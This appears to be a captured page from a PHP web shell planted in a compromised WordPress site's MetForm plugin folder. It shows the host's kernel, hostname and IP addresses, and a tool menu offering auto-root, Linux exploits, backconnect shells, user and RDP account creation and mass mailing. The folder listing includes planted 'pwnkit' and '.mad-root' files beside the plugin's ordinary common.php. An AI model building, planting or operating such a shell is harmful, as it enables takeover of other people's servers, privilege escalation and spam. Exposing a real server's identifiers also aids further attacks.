Linux webm021.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.21 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
5.4.45
premiey
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
premiey /
www /
wp-content /
plugins /
metform /
base /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
api.php
1.04
KB
-rw-r--r--
common.php
589
B
-rw-r--r--
cpt.php
390
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
shortcode.php
7.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : common.php
<?php namespace MetForm\Base; defined('ABSPATH') || exit; abstract class Common { public function get_name() { return null; } public function get_title() { return $this->get_name(); } public function get_dir() { return dirname(__FILE__); } public function get_base() { return str_replace(\MetForm\Plugin::instance()->plugin_dir(), '', $this->get_dir()); return $this->get_dir(); } public function get_url() { return \MetForm\Plugin::instance()->plugin_url() . $this->get_base(); } public abstract function init(); }
Close